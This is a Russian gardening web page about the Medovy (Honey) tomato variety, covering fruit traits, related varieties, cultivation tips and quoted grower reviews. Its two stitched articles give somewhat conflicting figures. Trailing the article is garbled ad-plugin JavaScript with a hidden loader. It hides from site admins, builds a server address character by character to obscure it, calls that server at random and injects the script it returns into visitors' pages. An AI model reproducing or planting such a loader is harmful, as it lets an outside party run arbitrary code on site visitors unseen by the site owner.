Плоды имеют плоскоокруглую форму. Медовый — редкий пример сорта, у которого в характеристике плодов присутствует слово «мягкий». В то же время, из-за плотной кожицы помидоры нормально переносят перевозку. Плоды почти без ребристости, более чем с шестью семенными гнёздами, количество семян невелико. В созревшем состоянии они окрашены в малиновый цвет, крупные: средняя масса составляет 300–400 г, а первые плоды, на нижних ярусах, ещё крупнее, вплоть до 700 г. Вкус сладкий, характеризуется как отличный, сокосодержание высокое, сахаристость сока около 5%. Основное назначение — салатное. Избыток урожая может быть переработан на томатную пасту, различные соусы, сок. Засол возможен только в бочках.

Даже производитель семян советует делать из Медового томатный сок

Помидоры, снятые в состоянии бланжевой спелости, хорошо дозариваются в комнатных условиях. Урожайность, для индетерминантного крупноплодного сорта, нельзя признать высокой: около 8 кг/м 2 . В то же время, огородники сообщают, что при тщательном уходе эта величина может быть увеличена почти вдвое. Холодостойкость, как у всех сибирских сортов, высокая. Редко поражается грибковыми заболеваниями.

Видео: общая характеристика томата Медовый

Внешний вид

По внешнему виду спелые помидоры сорта Медовый очень красивые. Они крупные, почти правильной формы: круглые, но уплощённые сверху и снизу. Существенных изъянов на поверхности не наблюдается. Окраска зависит от степени созревания и является переходной от тёмно-розовой к малиновой, ровной она становится только в самом конце, сначала возможны небольшие полоски, пятна и т. д. Нельзя сказать, что по внешнему виду сорт легко узнать: в настоящее время известно много помидоров аналогичной формы и окраски. И все они обычно создают впечатление превосходного вкуса. В случае томата Медовый, как и большинства аналогов, это предположение оправдывается при дегустации.

Плоды томата Медовый ровненькие, почти правильной формы

Преимущества и недостатки, особенности, отличия от других сортов

Салатных сортов помидоров существует очень много, до половины характеризуется отличным вкусом плодов, многие из них крупноплодные. К тому же, в последнее десятилетие наблюдался интерес именно к разработке розовоплодных сортов томатов. Поэтому конкурентов у Медового немало, и интересно, чем он ухитряется поддерживать свою популярность. Основными достоинствами сорта считаются:

  • крупноплодность;
  • приятный внешний вид;
  • отличный вкус;
  • способность к дозреванию при хранении;
  • высокая холодостойкость;
  • транспортабельность.

Недостатком сорта считается повышенная ломкость побегов, заставляющая очень аккуратно обращаться с ними в процессе пасынкования кустов и подвязывания стеблей.

Примерно в одно время с томатом Медовый в Новосибирске коллективом В. Н. Дедерко был выведен сорт Медовый спас, но он отличается по многим показателям, начиная с окраски плодов: она оранжевая. Урожайность Медового спаса выше, чем томата Медовый, но величина плодов вдвое меньше. Оранжевоплодный сорт Медовый гигант ничем особенным не отличается, как и сорт Медовый налив с яйцевидными плодами среднего размера.

Интересен новый сорт Медовый салют с жёлтыми полукилограммовыми помидорами отличного вкуса. Очень неплох новосибирский сорт Розовый мёд, а довольно новый Малиновый мёд с плодами превосходного вкуса проявляет урожайность около 18 кг/м 2 . Наконец, интересна новая разработка ростовских селекционеров, получившая название Алтайский мёд. Этот томат созревает очень рано, плодоносит крупными оранжевыми помидорами сердцевидной формы отличного вкуса. Его урожайность не более 7 кг/м 2 , но надо учитывать, что Алтайский мёд — детерминантный сорт.

Томат Медовый салют, появившийся недавно, подходят для любителей чего-нибудь необычного

Таким образом, можно считать, что слова «мёд» или «медовый», используемые при названии сорта помидоров, не всегда оправданы, но в ряде случаев вкус плодов действительно таковым и является. В этом ряду рассматриваемый сорт Медовый является далеко не самым плохим. Скорее, наоборот, его можно расположить в верхней половине рейтинга среди аналогичных сортов.

Особенности посадки и выращивания томата Медовый

Томат Медовый вырастить несложно, но для того, чтобы он проявил свой вкус в полной мере, для посадки надо подобрать самое солнечное место. Выращивают его только через рассаду, посев семян в ящички проводят в обычные для большинства индетерминантов сроки. Их рассчитывают так, чтобы от момента посева семян до высадки рассады в грядку оставалось 60–70 дней. Рассада Медового перерастает редко, и если в первые 4–5 дней всходы подержать в прохладном освещённом месте, ей вытягивание не грозит. Пикировать сеянцы с двумя настоящими листочками лучше в отдельные стаканчики среднего размера.

Несмотря на холодостойкость сорта, закаливание рассады за неделю до высадки в грунт обязательно. На каждый квадратный метр грядки можно посадить три или четыре растения (обычно четыре — это для теплицы). Колья для подвязки следует вбить сразу, да и с подвязыванием тянуть не стоит: у этого сорта стебли хрупкие, их надо осторожно подвязывать по мере роста, не дожидаясь завязывания плодов.

В теплице лучше вести куст Медового в один стебель, а в открытом грунте — в два. Остальные пасынки аккуратно удаляют. Если чаще всего огородники делают это голыми руками, в данном случае лучше использовать секатор, чтобы случайно не сломать стебли. С ростом плодов под кисти подставляют подпорки: это надёжнее, чем их подвязывать.

Кусты Медового формируют по стандартным схемам, но операции надо проводить предельно аккуратно

До начала покраснения плодов почву держат умеренно влажной, но затем поливы сильно сокращают, избегая растрескивания плодов и стараясь обеспечить им большее сахаронакопление. Подкармливают Медовый по традиционной схеме: трижды за сезон, сначала полным удобрением, а в третий раз — только настоем древесной золы.

Отзывы

Медовый — понравился сорт, урожайный, почти все достаточно крупные.

Любовь

http://www.tomat-pomidor.com/forums/topic/915-%D0%BC%D0%B5%D0%B4%D0%BE%D0%B2%D1%8B%D0%B9/

Первое впечатление: крупный сладкий томат на еду и переработку. Оценка рассады — 3-, куста — 4+, плода — 5, общая оценка сорта — 5.

Алёна

http://www.tomat-pomidor.com/forums/topic/915-%D0%BC%D0%B5%D0%B4%D0%BE%D0%B2%D1%8B%D0%B9/

Выращивалась в теплице, но практически полностью открытой со всех сторон. Растения мощные, беспроблемные. Завязывали все кисти. Плоды вкусные, мясистые, розовые. В рассаде вёл себя на 5+. Крепенькие такие деревца с тёмной листвой обычного типа. У меня получился средне поздним. По всем параметрам понравился сорт….не зря я его сильно хотела.

Валентина

http://www.tomat-pomidor.com/forums/topic/915-%D0%BC%D0%B5%D0%B4%D0%BE%D0%B2%D1%8B%D0%B9/

Вкусовые качества на уровне розовых сортов. Ничего медового я не заметил. Сорт исключительно салатного назначения. Требует больше места. Растение раскидистое. Оптимальная схема посадки 50*60. Тут производитель не наврал. На один квадратный метр нужно сажать не более 4 кустов. Я сажал по схеме 40*60. Может быть, поэтому этот сорт меня не порадовал. Вообще в этом году в Подмосковье лето было аномальным. С помидорами у всех были проблемы. Я же сужу по другим сортам. У них урожайность была лучше.

Алгам

http://otzovik.com/review_5694224.html

Урожайность хорошая, с одного куста можно снять 3–4 кг помидор. Сорт не прихотлив, устойчив к перепадам температуры, у него высокий иммунитет к заболеваниям. Ветки лучше подвязывать, чтобы не обломились, и не только основные стебли, но и кисти с плодами. Лучше высаживать на солнечном месте. Мякоть плотная, мясистая, сладкая. Кожица не толстая, но прочная. Вкусный получается томатный сок.

Кейткеллер

https://otzovik.com/review_6382901.html

Томат Медовый — очень неплохой салатный сорт, полностью оправдывающий своё название. Конечно, у него есть и аналоги, и даже конкуренты, но пока ещё Медовый остаётся довольно популярным у огородников-любителей во всех регионах страны.

Сорт томата Медовый

Сладкие помидоры лучше всего использовать для приготовления салатов или сока. Среди многих сортов особенно выделяется розовый томат Медовый. Он полностью оправдывает название, ведь имеет сладковатую, мясистую мякоть с большим содержанием сока. Подробно об этом сорте можно узнать из этой статьи.

Описание сорта томата Медовый

Томат Медовый относится к среднеспелым сортам. Для полного созревания первым плодам необходимо 110-115 суток. Куст индетерминантный, высокий, требует подвязки к шпалере или колышкам. Листья большие, темно-зеленого окраса. Соцветия простого типа.

Плоды томатов Медовый растут массой 300-400 г. Вкус сладковатый с медовым послевкусием

Плоды округлые, сплюснутые сверху и снизу. Для сорта характерна крупная ребристость. После полного созревания кожура приобретает ярко-розовый цвет. Плоды растут массой 300-400 г. Мякоть многокамерная, мясистая, с большим количеством сока. Семян не много. Вкус сладковатый, с медовым послевкусием, откуда и пошло название.

Характеристика помидоров

Подробная характеристика томатов позволяет лучше ознакомиться с сортом. Томаты сорта Медовый обладают массой преимуществ перед другими сортами.

Мякоть многокамерная, мясистая, с большим количеством сока

  • Может выращиваться в теплице и в открытом грунте.
  • Урожайность высокая.
  • Если плоды собрали раньше срока и они зеленоваты, их можно положить на подоконник, чтобы дозрели. Дозревают они быстро, вкус от этого не портится.
  • Лежкость неплохая. Чтобы плоды не испортились быстро, их важно хранить в холодильных камерах или в любом другом прохладном месте. Перед закладкой на хранение томаты сортируют по степени созревания.
  • Благодаря плотной кожуре помидоры этого сорта легко переносят транспортировку на близкие и средние расстояния.
  • Товарные качества хорошие.
  • Приспособлен для выращивания в Сибири и регионах с подобными климатическими условиями.
  • Томат Медовый очень любит свет. Если света будет недостаточно, развитие будет замедлено.
  • Растения устойчивы к перепадам температур.
  • Иммунитет устойчив ко многим заболеваниям.

Рассада делается в среднем за 2 месяца до посадки

Особенности выращивания

Сорт помидор Медовый хорошо произрастает как в закрытом, так и в открытом грунте. И все же специалисты рекомендуют выращивать его под открытым небом только в южных регионах, где лето долгое и теплое. В средней полосе стоит отдать предпочтение тепличному выращиванию, чтобы получить действительно сладкий урожай.

Выращивают эти томаты обычно рассадным методом. Рассада делается в среднем за 2 месяца до дня пересадки на постоянное место. На стадии 2 листиков проводится пикировка ростков по отдельным стаканчикам. Когда рассада будет уже достаточно окрепшей, ее пересаживают в грунт. На квадратном метре размещается 3-4 ростка.

  • Формируется куст в 2 стебля. Чтобы получить 2 ствол, необходимо оставить боковой побег – пасынок, который появится под первой цветочной кистью. Пасынкование проводится регулярно, иначе урожай может долго вызревать.
  • Подвязывать помидоры крайне рекомендуется каким-нибудь ненатуральным материалом. Если использовать материалы натуральные, вроде хлопковой ткани, может начать гнить стебель.
  • Во время созревания плодов поливы важно проводить не часто. Конечно, от большого количества влаги томаты растут крупными, но это может снизить концентрацию сахаров и питательных веществ. А в конце созревания плодов поливы вообще прекращают.

Куст индетерминантный, высокий, требует подвязки

  • Томат Медовый может болеть, как и другие виды помидор. Но при желании можно сократить заболеваемость к минимуму. Для этого каждый сезон проводится 2-3 опрыскиваний фунгицидами и инсектицидами. Такие обработки имеют профилактический характер, поэтому используются препараты комплексного действия. Для профилактики можно также использовать народные настои и растворы.

Урожайность томата Медовый в среднем до 15 кг с квадрата

Урожайность сорта

Урожайность томата Медовый в среднем до 15 кг плодов с каждого квадрата посадок. Но, если растения не подкармливать, не поливать должным образом, она снизится до 8-10 кг. В среднем с одного куста собирают за год до 3,5 кг томатов.

Урожай подходит для приготовления сока, соуса. Из плодов получаются вкуснейшие летние салаты, свежие закуски.

Отзывы о сорте томата Медовый

Томат сорта Медовый пользуется большим спросом у огородников. Его не трудно выращивать и плоды он дает очень вкусные.

  • Людмила Грибко: «Хоть сорт и называется Медовым, мой урожай сладостью не отличался, но возможно дело в недостатке солнца, не знаю. Уход за кустами был не трудный. Обрабатывала пару раз фунгицидами, проводила регулярные подкормки минералами. Помидоры выросли большие, насыщенного цвета. Для салатов то, что нужно. И все же жаль, то они не такие сладкие, как хотелось бы, ожидала большего!».
  • Андрей Короза: «Неплохой сорт. Растут томаты красивыми, мякоть почти красная, очень сочная. Практически весь урожай переработала на сок. Семья очень довольна. В уходе растения не требовательны. Даже если забывала поливать, росли без проблем. Плоды получились сладкими, очень вкусными, хоть продавай! В следующем году обязательно будут снова их сажать».
  • Татьяна Давыдова: «Раньше всегда выращивала эти помидоры в открытом грунте. В этот раз попробовала сделать их в теплице – оказалось, что так выращивать даже проще. Урожая собрала в 1,5 раза больше. Плоды очень сладкие, насыщенного цвета, половину продали, вторую пустили на консервацию. Очень довольна сортом, теперь будут выращивать каждый год в теплицах!».
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};